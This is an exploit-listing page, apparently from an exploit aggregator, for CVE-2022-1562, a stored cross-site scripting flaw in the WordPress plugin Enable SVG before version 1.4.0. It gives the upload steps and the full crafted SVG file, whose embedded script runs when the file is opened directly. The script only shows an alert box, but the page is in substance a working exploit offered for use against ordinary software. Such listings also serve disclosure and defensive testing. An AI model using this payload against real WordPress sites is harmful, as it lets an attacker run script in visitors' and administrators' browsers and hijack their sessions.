Exploit for Enable SVG < 1.4.0 - Author+ Stored Cross Site Scripting via SVG CVE-2022-1562

Name: Exploit for Enable SVG < 1.4.0 - Author+ Stored Cross Site Scripting via SVG CVE-2022-1562
Rating: 5 (70 reviews)

2022-05-03 | CVSS 3.5

## https://sploitus.com/exploit?id=WPEX-ID:8E5B1E4F-C132-42EE-B2D0-7306AB4AB615
As an author or above, upload the below SVG file via the Media library:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400" />
<script type="text/javascript">
alert(/XSS/);
</script>
</svg>

The XSS will be triggered when accessing the file directly, e.g https://example.com/wp-content/uploads/2022/05/xss.svg